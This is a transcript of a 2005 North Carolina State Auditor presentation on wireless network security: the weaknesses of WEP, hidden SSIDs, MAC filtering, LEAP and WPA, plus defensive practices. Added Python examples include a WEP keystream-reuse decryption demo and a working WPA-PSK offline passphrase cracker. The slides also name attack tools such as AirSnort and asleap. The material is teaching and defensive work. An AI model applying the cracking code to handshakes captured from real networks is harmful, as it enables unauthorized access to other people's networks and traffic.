Office of the State Auditor North Carolina
Wireless Access and Security
Dr. Lenny Superville, Ph.D., CIO: NC Office of the State Auditor
NC Digital Government Summit, September 13-14, 2005



Page 2


Focus in this Presentation

• Why some government agencies choose proprietary rather than standards-based wireless networks (WLANs), and why others do not

• Some well-used proprietary wireless networks – Secret

• A survey of the IEEE 802.11 (Wi-Fi) WLAN standards – Open

• Tools attackers use to sniff or intrude into WLANs – Threats

• Effective options for keeping unauthorized users and attackers out of WLANs – Countermeasures

• A protection methodology for WLAN mobile computing – While performing day-to-day operations

Page 3


At the End of this Presentation, you should be able to understand:

• The major security concerns associated with the various wireless topologies, especially standards-based ones

• The vulnerabilities of WLAN mobile computing environments

• The defenses available to protect WLAN mobile computing environments

• Best practices for implementing and maintaining data security while using wireless data communications in day-to-day operations

Page 4


Well Known Examples of Secured Proprietary Wireless/Wired Networks

• Proprietary means a secret (non-public) encryption algorithm plus dedicated hardware:

• NIPRNET – (DoD) Non-classified Internet Protocol Router Network, for unclassified but sensitive traffic (BLUE)

• SIPRNET – (DoD) Secret Internet Protocol Router Network, for classified traffic (RED)

• Land Warrior computer/radio subsystem – (Army)

• CAISI (Army) – Combat Service Support Automated Information System Interface

The less widely known the design, the better the security, so the argument goes. In practice the security of a network like SIPRNET rests on NSA-certified encryption hardware and strict physical and access controls, not on secrecy of the algorithm alone.

Beware: this technology requires additional, costly hardware and IT staff to implement and maintain.

Page 5


Characteristics of Proprietary Enterprise Wireless Secured Networks – Complete Solution

• Sophisticated encryption
• Strong authentication
• Stringent access control
• http://www.airdefense.net/
• http://www.cisco.com/
• http://www.airmagnet.com/
• This combined technology implementation is so successful because it acts as a secure gateway to the numerous networks that must be accessed

• Questions – 5 minutes

Page 6


WLANs – Wireless Networking/IEEE Standards – Open

WEP/WLAN/Radio waves
• 802.11, or Wi-Fi
• 802.11b: 2.4 GHz, 11 Mbps
• 802.11a: 5 GHz, 54 Mbps
• 802.11g: 2.4 GHz, 54 Mbps
• 802.11i: security amendment for 802.11a/b/g

802.11a and 802.11g are both 54 Mbps; 802.11g's lower operating frequency gives it greater range.

EAP (Extensible Authentication Protocol) is a general framework for authentication (RFC 3748); the specific method (TLS, PEAP, etc.) is carried as its payload.

IEEE 802.1X specifies how EAP is encapsulated in LAN frames (EAPOL) and keeps the port blocked until authentication succeeds.

Page 7


IEEE 802.11 WLANs (Standards Based – Open)

• WEP – fixed key: can be broken; device authorization only (no user authentication)
• EAP-MD5 – no certificates; user authentication via 802.1X against an authentication server; the challenge/response is open to an offline dictionary attack, the server is never authenticated to the client, and it produces no keying material, so it cannot drive WEP/TKIP key rotation
• EAP-LEAP – no certificates; rotating per-session keys (TKIP); Cisco
• EAP-TLS – two certificates (server and client); TKIP
• EAP-FAST – no certificates (Cisco)
• EAP-TTLS – one certificate (server); TKIP
• EAP-PEAP – one certificate (server); TKIP
• WPA – 802.11 with TKIP (WPA is not an EAP type; in enterprise mode it uses 802.1X/EAP for authentication)
• WPA2 – 802.11i with CCMP/AES (AES defines 128-, 192- and 256-bit keys; CCMP uses a 128-bit key)
• AES may be the answer to securing standards-based WLANs.
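To make the 802.1X/EAP encapsulation and the method table above concrete, here is an added example in Python (not code from the presentation) that builds a constructed EAPOL exchange inline and decodes the EAPOL header, the EAP header and the EAP Type byte that names the method. The lookup of which methods present a server certificate mirrors the table above; the identity string, the PEAP Start flag and the frame bytes are constructed for illustration.

```python
"""Decode an IEEE 802.1X EAPOL frame and the EAP packet it carries.

Added example, not from the original presentation. Layouts follow
IEEE 802.1X (EAPOL header) and RFC 3748 (EAP header); the sample frames
are constructed inline.
"""
import struct

EAPOL_TYPES = {0: "EAP-Packet", 1: "EAPOL-Start", 2: "EAPOL-Logoff", 3: "EAPOL-Key"}
EAP_CODES = {1: "Request", 2: "Response", 3: "Success", 4: "Failure"}
# EAP method types from the IANA registry: the methods named on the slide plus the basics.
EAP_METHODS = {
    1: "Identity", 2: "Notification", 3: "Nak", 4: "MD5-Challenge",
    13: "EAP-TLS", 17: "LEAP", 21: "EAP-TTLS", 25: "PEAP", 43: "EAP-FAST",
}
# Whether the method authenticates the server to the client with a certificate
# (True), does not (False), or the question does not apply (missing -> None).
SERVER_CERTIFICATE = {4: False, 17: False, 43: False, 13: True, 21: True, 25: True}


def parse_eapol(frame: bytes) -> dict:
    """Parse EAPOL (version, type, length) and, for EAP-Packet, the EAP header.

    Raises ValueError on truncated or inconsistent frames instead of guessing,
    which is what a supplicant or wireless IDS parser should do as well.
    """
    if len(frame) < 4:
        raise ValueError("EAPOL frame too short")
    version, ptype, body_len = struct.unpack("!BBH", frame[:4])
    if ptype not in EAPOL_TYPES:
        raise ValueError(f"unknown EAPOL packet type {ptype}")
    body = frame[4:4 + body_len]
    if len(body) != body_len:
        raise ValueError("EAPOL body truncated")
    result = {"eapol_version": version, "eapol_type": EAPOL_TYPES[ptype]}
    if ptype != 0:
        return result                      # Start/Logoff/Key carry no EAP packet
    if len(body) < 4:
        raise ValueError("EAP header too short")
    code, ident, eap_len = struct.unpack("!BBH", body[:4])
    if code not in EAP_CODES:
        raise ValueError(f"unknown EAP code {code}")
    if eap_len < 4 or eap_len > len(body):
        raise ValueError("EAP length inconsistent with EAPOL body length")
    result.update({"eap_code": EAP_CODES[code], "eap_id": ident})
    if code in (1, 2):                     # Request/Response: Type byte + type-data
        if eap_len < 5:
            raise ValueError("EAP Request/Response is missing its Type byte")
        mtype = body[4]
        result["eap_method"] = EAP_METHODS.get(mtype, f"type-{mtype}")
        result["type_data"] = body[5:eap_len]
        result["server_certificate"] = SERVER_CERTIFICATE.get(mtype)
    return result


def build_eapol_eap(code: int, ident: int, mtype: int, data: bytes) -> bytes:
    """Wrap an EAP Request/Response in an EAPOL EAP-Packet (EAPOL version 1)."""
    eap = struct.pack("!BBHB", code, ident, 5 + len(data), mtype) + data
    return struct.pack("!BBH", 1, 0, len(eap)) + eap


if __name__ == "__main__":
    # Constructed exchange: authenticator requests identity, supplicant answers,
    # authenticator starts PEAP (type 25; flags byte 0x20 = Start).
    for f in (build_eapol_eap(1, 1, 1, b""),
              build_eapol_eap(2, 1, 1, b"auditor@osa.example"),
              build_eapol_eap(1, 2, 25, b"\x20")):
        print(parse_eapol(f))
```

A supplicant, a RADIUS front end and a wireless IDS all parse exactly these bytes, which is why the length checks matter: an EAP length larger than the EAPOL body is how malformed-frame bugs start.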

Page 8


Examples of Government Efforts to Implement 802.11 Wireless Networks (WLANs)

• Wired Equivalent Privacy (WEP) shipped with the original 802.11 standard in the 1990s, but in 2001 serious security exposures were found in it (the Fluhrer-Mantin-Shamir key-recovery attack among them), affecting the IEEE 802.11b networks then in the field

• In the 1990s the Data Encryption Standard (DES) was found to be vulnerable: its 56-bit key was brute-forced in 1998

• As of 2002 the Advanced Encryption Standard (AES), with its three key sizes – 128, 192 and 256 bits – may be the solution.

• As of 2005, AES is still the best bet for a secured WLAN.

Page 9


Threats to WLANs – A threat can be the perception of insecurity

War driving – driving around to discover wireless networks, for a later attack or just for the sport of it.

• NetStumbler is a well-known freeware tool that discovers WLANs by active probing; it sees networks whose SSID broadcast is enabled

• Kismet discovers WLANs passively, even when SSID broadcast is disabled

• KisMAC (Mac OS X) – can be used for security auditing or for intrusion

Page 10


Examples of War Driving Tools – Intrusion is entry by force or without permission or welcome

Check http://www.netstumbler.com
• NetStumbler (Windows); MiniStumbler (CE/PocketPC)

Check http://www.kismetwireless.net
• Kismet (Linux/Unix)

Check http://www.remote-exploit.org
• Wellenreiter (Linux/Unix)

Page 11


Some Major Threats – You should know

• Wired mobile LANs used for training at corporate sites (e.g. Ethernet)

• Wireless mobile LANs used for training at corporate sites (e.g. WEP, WPA2)

• Wireless Internet Service Provider (WISP) – theft of service
• Hotspot hijinks – page-jacking
• Wireless sniffing – interception of traffic

Note: wireless sniffing is passive in nature, so the network being monitored cannot detect it.

Page 12


Countermeasures to WLANs – A countermeasure is an action taken to offset another action

A countermeasure is a system (usually for a military application) designed to prevent weapons (Threats) from acquiring and/or destroying a target (WLANs)

Page 13


WLANs Countermeasures: Are they reliable?

• Wired Equivalent Privacy (WEP): a security protocol for wireless local area networks (WLANs)

• Attributes:
• Defined in the original IEEE 802.11 standard (and inherited by 802.11b)
• The IEEE security component for 802.11
• Concerns:
• AirSnort, once enough packets have been gathered, can recover the key in less than a second
• Uses RC4 encryption
• Improper use of the IV (only 24 bits, prepended to a static key, so keystreams repeat) makes the protocol vulnerable
• Uses only one shared key, which is never changed

Note: 128-bit WEP (a 104-bit key) is not officially part of the standard, and some manufacturers' key entry methods are incompatible with one another.
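The IV concern is worth seeing in code. The following added example (Python, not code from the presentation) implements RC4 as WEP uses it, encrypts two constructed frames under the same static key and the same 24-bit IV, and recovers the second plaintext from the first. AirSnort's attack goes further (it recovers the key itself from weak IVs, the Fluhrer-Mantin-Shamir result); this example shows only the more basic keystream-reuse problem. The key, IV and frame contents are made up.

```python
"""WEP keystream reuse: why a 24-bit IV on a static key is fatal.

Added example, not from the original presentation. It implements RC4
(the cipher WEP uses), encrypts two constructed frames under the same
static key with the same IV, and recovers the second plaintext from the
first, because C1 xor C2 = P1 xor P2 whenever the keystream repeats.
The key, IV and frame contents are made up; the CRC-32 ICV is omitted.
"""


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 key scheduling plus keystream generation, XORed over data
    (encryption and decryption are the same operation)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(static_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP per-packet RC4 key is IV (3 bytes, sent in the clear) || static key."""
    if len(iv) != 3:
        raise ValueError("WEP IV is 24 bits")
    return iv + rc4(iv + static_key, plaintext)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def recover_with_known_plaintext(c1: bytes, c2: bytes, known_p1: bytes) -> bytes:
    """Two frames with the same IV share a keystream K, so K = C1 xor P1 and
    P2 = C2 xor K. Known P1 can be a predictable ARP/DHCP payload or a frame
    the attacker caused to be sent."""
    if c1[:3] != c2[:3]:
        raise ValueError("different IVs: keystreams differ, nothing to reuse")
    keystream = xor(c1[3:], known_p1)
    return xor(c2[3:], keystream)


def expected_frames_until_iv_collision(iv_bits: int = 24) -> int:
    """Birthday bound: a repeated IV is expected after about sqrt(2^bits) frames."""
    return int((2 ** iv_bits) ** 0.5)


if __name__ == "__main__":
    key = bytes.fromhex("0badc0ffee")          # constructed 40-bit WEP key
    iv = bytes.fromhex("000001")
    p1 = b"GET /login HTTP/1.0\r\n"
    p2 = b"password=hunter2\r\n"
    c1 = wep_encrypt(key, iv, p1)
    c2 = wep_encrypt(key, iv, p2)
    print(recover_with_known_plaintext(c1, c2, p1))      # recovers p2
    print(expected_frames_until_iv_collision())           # 4096
```

A busy access point sends thousands of frames a minute, so an IV repeat is a matter of minutes even if the driver picks IVs at random, and many drivers of the period simply counted up from zero after every reset.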

Page 14


Countermeasures: Reliable? (Cont'd)

• The service set identifier (SSID) is the network name; it is often treated as if it were a password

• Attributes:
• Blanks the SSID field in the 802.11 beacon frame
• Disables the response to broadcast probe requests
• No SSID – no association – (T/F)?
• Concerns:
• The SSID is broadcast in the clear in every client association frame
• Tools can force a client to disassociate and re-associate to expose the SSID; ESSID-Jack, a freeware tool, can expose a hidden SSID in seconds
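An added example (Python, not code from the presentation) of what SSID hiding does and does not hide: it parses the information elements of constructed 802.11 management-frame bodies, a beacon from an AP with SSID broadcast disabled and an association request from a client, and shows that the name is absent from the first and present in the clear in the second. The frame bodies, the SSID and the capability bits are constructed.

```python
"""What "hiding" the SSID actually hides.

Added example, not part of the original presentation. It parses the
information elements (IEs) of constructed 802.11 management-frame bodies:
a beacon from an AP with SSID broadcast disabled (empty or zero-filled
SSID IE) and an association request, which must carry the name in the
clear. Frame bodies are built inline; no radio is involved.
"""
import struct
from typing import Optional

IE_SSID = 0
IE_SUPPORTED_RATES = 1


def parse_ies(body: bytes) -> dict:
    """Walk the tag/length/value information elements of a management frame body."""
    ies = {}
    i = 0
    while i + 2 <= len(body):
        tag, length = body[i], body[i + 1]
        value = body[i + 2:i + 2 + length]
        if len(value) != length:
            raise ValueError("truncated information element")
        ies.setdefault(tag, []).append(value)
        i += 2 + length
    return ies


def ssid_from_beacon(beacon_body: bytes) -> Optional[str]:
    """Beacon body: 8-byte timestamp, 2-byte interval, 2-byte capability, then IEs.
    Returns None when the AP is 'hiding' the name (empty or all-zero SSID IE)."""
    ies = parse_ies(beacon_body[12:])
    raw = ies.get(IE_SSID, [b""])[0]
    if not raw or raw == b"\x00" * len(raw):
        return None
    return raw.decode("utf-8", "replace")


def ssid_from_assoc_request(body: bytes) -> str:
    """Association request body: 2-byte capability, 2-byte listen interval, then IEs.
    The client has to name the network it wants, so the SSID is always here."""
    ies = parse_ies(body[4:])
    return ies[IE_SSID][0].decode("utf-8", "replace")


def build_beacon(ssid: bytes) -> bytes:
    """Constructed beacon body; capability bits ESS + privacy are set for realism."""
    fixed = struct.pack("<QHH", 0, 100, 0x0011)
    rates = bytes([IE_SUPPORTED_RATES, 4, 0x82, 0x84, 0x8B, 0x96])
    return fixed + bytes([IE_SSID, len(ssid)]) + ssid + rates


def build_assoc_request(ssid: bytes) -> bytes:
    """Constructed association request body from a client joining the network."""
    fixed = struct.pack("<HH", 0x0011, 10)
    rates = bytes([IE_SUPPORTED_RATES, 4, 0x82, 0x84, 0x8B, 0x96])
    return fixed + bytes([IE_SSID, len(ssid)]) + ssid + rates


if __name__ == "__main__":
    print(ssid_from_beacon(build_beacon(b"")))                       # None: hidden
    print(ssid_from_beacon(build_beacon(b"OSA-Wireless")))           # OSA-Wireless
    print(ssid_from_assoc_request(build_assoc_request(b"OSA-Wireless")))  # OSA-Wireless
```

Forcing a client to disassociate, as the slide describes, only makes it send a fresh association request sooner; the parser that reads the name out of that request is the part shown here, and it needs no more than the frame bytes.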

Page 15


Countermeasures: Reliable? (Cont'd)

• MAC address filtering: the Media Access Control address is a hardware address that uniquely identifies each node of a network

• Attributes:
• Place authorized MACs in each AP – if you don't have a valid MAC, you can't get in, (T/F)?

• Concerns:
• MACs are easily sniffed, and a client's MAC address can be changed in software

More than 50% of WLANs in major cities have no security.

Page 16


Countermeasures: Reliable? (Cont'd)

Cisco LEAP (Lightweight Extensible Authentication Protocol):
Attributes:
• Username/password required for access
• WEP keys rotate per session, defeating AirSnort's static-key attack
• EAP-MSCHAPv2 can be used as an inner authentication method with EAP-PEAP and EAP-TTLS, where an outer TLS tunnel protects it; LEAP sends its MS-CHAP-style exchange unprotected

Concern:
• Use of MS-CHAP-style challenge/response in the clear exposes credentials to a devastating and efficient offline dictionary attack: anyone who sniffs one challenge/response pair can test candidate passwords at leisure, and the third DES block of the response is keyed by only two bytes of the password hash, which is what makes the attack so fast
See: http://asleap.sourceforge.net for additional details

Best Buy and Lowe’s have experienced WLAN security breaches

Page 17


Countermeasures: Reliable? (Cont'd)

IPsec overlay: IPsec is an Internet-standard framework for establishing and managing data privacy between network entities.

Attributes: NAT and NAPT are techniques used to share and hide private IP addresses on edge devices such as routers and firewalls.

Concerns: Unfortunately, when an IPsec session runs through NAT or NAPT, security is often compromised (NAT rewrites the headers that AH integrity-protects; NAT traversal, which wraps ESP in UDP port 4500, is the usual workaround). And because IPsec protects only the IP traffic inside the tunnel, it leaves gaps on the wireless link itself:
1. Broadcast frames are unencrypted
2. ARP poisoning is still possible and can be used for a DoS attack
3. The client is protected only after it has authenticated

Page 18


Countermeasures: Reliable? (Cont'd)

802.1X / WPA / 802.11i: Wi-Fi Protected Access for WLANs
Attributes:
• In the original 802.11 standard, 802.1X authentication was optional; 802.1X authentication is required in WPA (enterprise mode)
• The 802.11i standard addresses many of the security issues of the original 802.11 standard
Concerns:
• Single-factor authentication (with few exceptions)
• Multiple EAP types offer questionable security and vendor incompatibilities
• Attacks have already been presented against WPA: a weak pre-shared passphrase can be recovered offline from one captured handshake

WPA's TKIP includes a built-in countermeasure against forgery: after two MIC failures within 60 seconds the AP shuts down TKIP traffic for one minute, which an attacker can deliberately trigger to take the AP off the air.
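The attack against WPA-PSK, worked through as an added example (Python, not code from the presentation): it derives the PSK from a passphrase and SSID (PBKDF2-HMAC-SHA1, 4096 rounds, as 802.11i specifies), expands it to the PTK with the 802.11i PRF over the handshake addresses and nonces, computes the message-2 MIC, and then runs a wordlist against a simulated capture. The SSID, passphrase, MAC addresses, nonces and wordlist are made up; the EAPOL-Key frame is shaped like a real message 2 but its key data field is left empty.

```python
"""WPA/WPA2-PSK key derivation and the offline dictionary attack it allows.

Added example, not from the original presentation. PMK = PBKDF2-HMAC-SHA1
(passphrase, SSID, 4096, 32); PTK = PRF(PMK, "Pairwise key expansion",
min(AA,SPA)||max(AA,SPA)||min(ANonce,SNonce)||max(ANonce,SNonce)); the
message-2 MIC is HMAC-SHA1(KCK, EAPOL frame with MIC zeroed) truncated to
16 bytes (key descriptor version 2, used with CCMP). All "captured" values
below are constructed.
"""
import hashlib
import hmac


def wpa_psk(passphrase: str, ssid: str) -> bytes:
    """PMK from a passphrase: PBKDF2-HMAC-SHA1, 4096 iterations, 256-bit output."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def wpa_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Pairwise transient key; the first 16 bytes are the KCK used for the EAPOL MIC."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 64)


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """Key MIC for descriptor version 2: HMAC-SHA1 truncated to 128 bits."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def dictionary_attack(ssid, aa, spa, anonce, snonce, eapol_zeroed, mic, wordlist):
    """Try each candidate passphrase; a MIC match means the PSK is recovered."""
    for candidate in wordlist:
        ptk = wpa_ptk(wpa_psk(candidate, ssid), aa, spa, anonce, snonce)
        if hmac.compare_digest(eapol_mic(ptk[:16], eapol_zeroed), mic):
            return candidate
    return None


# --- constructed "capture" of a 4-way handshake ---------------------------
SSID = "OSA-Wireless"
AA = bytes.fromhex("00112233aabb")     # authenticator (AP) MAC, made up
SPA = bytes.fromhex("00aabbccddee")    # supplicant (client) MAC, made up
ANONCE = hashlib.sha256(b"anonce-sample").digest()   # deterministic stand-ins for the
SNONCE = hashlib.sha256(b"snonce-sample").digest()   # 32-byte random nonces
EAPOL_MSG2_ZEROED = (
    bytes.fromhex("0103005f")      # EAPOL v1, type 3 (Key), body length 95
    + bytes.fromhex("02")          # descriptor type: RSN
    + bytes.fromhex("010a")        # key info: version 2, pairwise, MIC present
    + bytes.fromhex("0010")        # key length 16 (CCMP)
    + bytes(8)                     # replay counter
    + SNONCE                       # key nonce
    + bytes(16 + 8 + 8)            # key IV, RSC, key ID (zero in message 2)
    + bytes(16)                    # MIC field, zeroed for the computation
    + bytes(2)                     # key data length 0 (RSN IE omitted here)
)
TRUE_PASSPHRASE = "raleigh2005"    # the weak passphrase the "victim" network uses


def simulate_capture() -> bytes:
    """The MIC the supplicant would put in message 2 under the true passphrase."""
    ptk = wpa_ptk(wpa_psk(TRUE_PASSPHRASE, SSID), AA, SPA, ANONCE, SNONCE)
    return eapol_mic(ptk[:16], EAPOL_MSG2_ZEROED)


if __name__ == "__main__":
    mic = simulate_capture()
    words = ["password", "letmein", "Raleigh", "raleigh2005", "summer05"]
    print(dictionary_attack(SSID, AA, SPA, ANONCE, SNONCE, EAPOL_MSG2_ZEROED, mic, words))
```

Every input to the MIC except the passphrase travels in the clear during the 4-way handshake, so one captured handshake is enough to test candidates offline indefinitely; the only defense in PSK mode is a long, random passphrase, and enterprise mode (802.1X/EAP) removes the shared secret altogether.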

Questions – 5 minutes

Page 19


Best Practices to implement & maintain data security – While Performing Day-to-Day Operations with WLANs

• Risk analysis – assess the vulnerabilities of the security architecture

• Well-written security policies
• A secure environment for the applications that produce data – strong passwords
• Secure servers where the data is stored – robust physical and network access controls
• Secure network level – firewall, IDS, IPS, etc.
• Protection against rogue access points

Page 20


A Protection Methodology – Now that some of the risks are understood, some prevention methods in a network infrastructure will be discussed.

• a. Host protection – remote users
• b. Data encryption – remote users and internal network
• c. Access methods – client vs. clientless VPNs
• d. Authentication technologies – control access to resources
• e. Endpoint security compliance – minimum requirements for access
• f. Protecting internal systems – modular approach
• g. Environments favorable to working with wireless – firewalls, anti-virus, strong authentication, etc.

Page 21


Example of a Secure Wireless/Wired Network Infrastructure [network diagram; not reproduced in the transcript]

Page 22


a. Host Protection (Remote User) – A centrally managed anti-virus platform is key

Protecting a remote host is paramount to protecting corporate data, assets and services. This can be accomplished by using a centrally managed anti-virus platform that:

• Provides visibility to remote systems upon connection
• Pushes updates to remote systems
• Synchronizes log information

A centrally managed host firewall platform that resides on the laptops and also provides some form of intrusion detection/ prevention will protect a remote host and the internal network.

Visibility on connection attempts and intrusion attempts will enable system administrators to fine-tune and adjust the technical controls and strengthen the overall posture of the organization.

Page 23


b. Data Encryption – provides a measure of confidentiality

• Users need to be aware of the risks associated with data on mobile devices. Ask yourself “what will be the situation if this device is lost or stolen?”

• Data encryption provides a measure of confidentiality if the laptop were to be lost, stolen or accessed by an unauthorized individual.

• This can be accomplished by numerous commercially available products.

• One drawback to the use of data encryption is the latency a user may experience while working with encrypted files.

Page 24


c. Access Methods – A case for Client VPN (Fat Client)

A traditional virtual private network (VPN) connection that utilizes industry standard encryption can provide local-like access to remote resources.

VPNs typically require the use of a client or software utility that provides the mechanism for remote connectivity.

VPN clients can provide a level of security to the remote host by disallowing unsolicited connections from unauthorized hosts

Page 25


c. Access Methods – A case for Clientless VPN (Thin Client)

Clientless VPNs are becoming more popular and are implemented using Secure Sockets Layer (SSL) technology. They operate in the same manner as a secured website (online banking) and can provide access similar to that of a client VPN.

There are limitations as to the types of services that can be used, but many of these limitations can be overcome by implementing enhancements such as web-enabled application servers.

Web-enabled application services, e.g. Citrix, can also mitigate many of the issues relative to client VPNs.

This approach provides only a “window” for the remote user to perform tasks, while using the operating system and resources of the application server.

System administrators can focus much of their effort on maintaining the application server and less on the remote hosts.

Page 26


d. Authentication Technologies - To control access to resources

User authentication is the method used to control access to resources and ensure that only authorized individuals are permitted access to internal systems.

A standard username and password are the primary credentials required for access to most systems. These, however, can be easily compromised or guessed if a strong password policy isn’t implemented and enforced.

Two-factor authentication is a method that combines something you know (word, phrase, or numbers) with something you have (token). This method of access ensures that only individuals in possession of a device (token) with the correct pin can gain entry to corporate resources.

Brute-force password guessing against a corporate asset protected by two-factor authentication is futile on its own, because the attacker would also need the token.

Page 27


e. Endpoint Security Compliance - minimum requirements for access

• Written policy, standards and guidelines are important and must address such issues as support, operating systems, minimum browser versions and minimum patch levels.

• This policy should also state what is prohibited, such as user-installed applications or spyware.

• Enforcement of this policy can be automated with technical controls that run when a user attempts to connect to the network.

Page 28


e. Endpoint Security Compliance – (Cont’d)

• Hosts can be audited for domain membership, the existence and status of anti-virus software, patch revision levels, intrusion detection signature revision levels and operating system configuration.

• Checks can also be performed to ensure that rogue software, such as peer-to-peer file sharing applications and instant messaging, is not present on the machine.

• Checking the remote host “at the door”, prior to allowing access to internal resources, is a measure that can prevent the introduction of a multitude of issues to a protected network.
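Checking the host at the door can be expressed as a small policy evaluator. The following added example (Python, not code from the presentation) evaluates constructed host inventory records of the kind a connection agent reports against a minimum-requirements policy covering domain membership, OS build, anti-virus status and signature age, host IDS signature level and prohibited software, and returns a decision together with every failing reason. The field names, the domain, the version numbers and the sample hosts are all made up.

```python
"""Endpoint compliance check "at the door".

Added example, not from the original presentation. A constructed host
inventory record (what a NAC agent reports on connect) is evaluated
against a minimum-requirements policy like the one the slides describe.
Field names, versions, the domain name and the sample hosts are made up.
"""
from datetime import date

POLICY = {
    "required_domain": "OSA",
    "min_os_build": (5, 1, 2600),            # constructed minimum build line
    "av_max_signature_age_days": 7,
    "min_ids_signature_version": 310,
    "prohibited_processes": {"kazaa.exe", "limewire.exe", "aim.exe", "msnmsgr.exe"},
}


def parse_build(text: str) -> tuple:
    """'5.1.2600' -> (5, 1, 2600); anything non-numeric sorts lowest."""
    return tuple(int(p) if p.isdigit() else -1 for p in text.split("."))


def evaluate(host: dict, policy: dict = POLICY, today: str = None) -> tuple:
    """Return (allowed, reasons). Every failing check is reported, not just the
    first, so the help desk can tell the user exactly what to fix.
    `today` is an ISO date string so the check is reproducible in tests."""
    now = date.fromisoformat(today) if today else date.today()
    reasons = []
    if host.get("domain") != policy["required_domain"]:
        reasons.append(f"not joined to domain {policy['required_domain']}")
    if parse_build(host.get("os_build", "0")) < policy["min_os_build"]:
        reasons.append(f"OS build {host.get('os_build', 'unknown')} below minimum")
    av = host.get("antivirus")
    if not av or not av.get("running"):
        reasons.append("anti-virus missing or not running")
    else:
        age = (now - date.fromisoformat(av["signature_date"])).days
        if age > policy["av_max_signature_age_days"]:
            reasons.append(f"anti-virus signatures are {age} days old")
    if host.get("ids_signature_version", 0) < policy["min_ids_signature_version"]:
        reasons.append("host IDS signatures below minimum version")
    running = {p.lower() for p in host.get("processes", [])}
    banned = running & policy["prohibited_processes"]
    if banned:
        reasons.append("prohibited software running: " + ", ".join(sorted(banned)))
    return (not reasons, reasons)


# Constructed sample hosts as reported on connection.
COMPLIANT_HOST = {
    "domain": "OSA", "os_build": "5.1.2600",
    "antivirus": {"running": True, "signature_date": "2005-09-10"},
    "ids_signature_version": 312,
    "processes": ["explorer.exe", "outlook.exe"],
}
ROGUE_HOST = {
    "domain": "WORKGROUP", "os_build": "5.0.2195",
    "antivirus": {"running": True, "signature_date": "2005-07-01"},
    "ids_signature_version": 298,
    "processes": ["explorer.exe", "KaZaA.exe"],
}

if __name__ == "__main__":
    print(evaluate(COMPLIANT_HOST, today="2005-09-13"))
    print(evaluate(ROGUE_HOST, today="2005-09-13"))
```

The agent's self-report is only as trustworthy as the agent, so a real deployment pairs a check like this with a quarantine VLAN and server-side verification (for example, the anti-virus console confirming the host really did check in) rather than taking the host's word for it.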

Page 29


f. Protecting Internal Systems – modular, VLANS, depth/defense –

A solid network design will take a modular approach by placing resources in a manageable area that can be monitored and protected.

The use of virtual local area networks (VLANs) in conjunction with intrusion detection and intrusion prevention systems (IDS/IPS) can provide an additional layer of protection from attacks via remotely connected hosts. This method also adds a layer of visibility into network activity internal to the organization.

Providing access to internal resources is necessary, but protecting the internal network from users connecting from home, hotels, airports and similar locations is often overlooked.

Page 30


g. Environments Favorable to Wireless Computing – Firewall protection, anti-virus and strong authentication

Accessing the Internal Network is possible from many environments and across many types of potentially hostile networks.

To protect the remote device and its data while in these hostile environments, several minimum security controls should be in place:

Firewall protection, anti-virus and strong authentication for the remote access technology are essential.

Firewall protection can exist in the form of software on the PC, or in the form of hardware like the small consumer devices that are available.

Wireless hotspots, foreign corporate environments, hotel rooms, home networks and coffee shops are all capable of being “home” to a remote user, and all present threats to the “trusted” device while remote

Page 31


Any Questions?

Dr. Lenny Superville, Ph.D.

Chief Information Officer (CIO)

Office of the State Auditor

2 S. Salisbury Street

20601 Mail Service Center

Raleigh, NC 27699-0601

Tele: (919) 807 7625

Fax: (919) 807 7647

[email protected]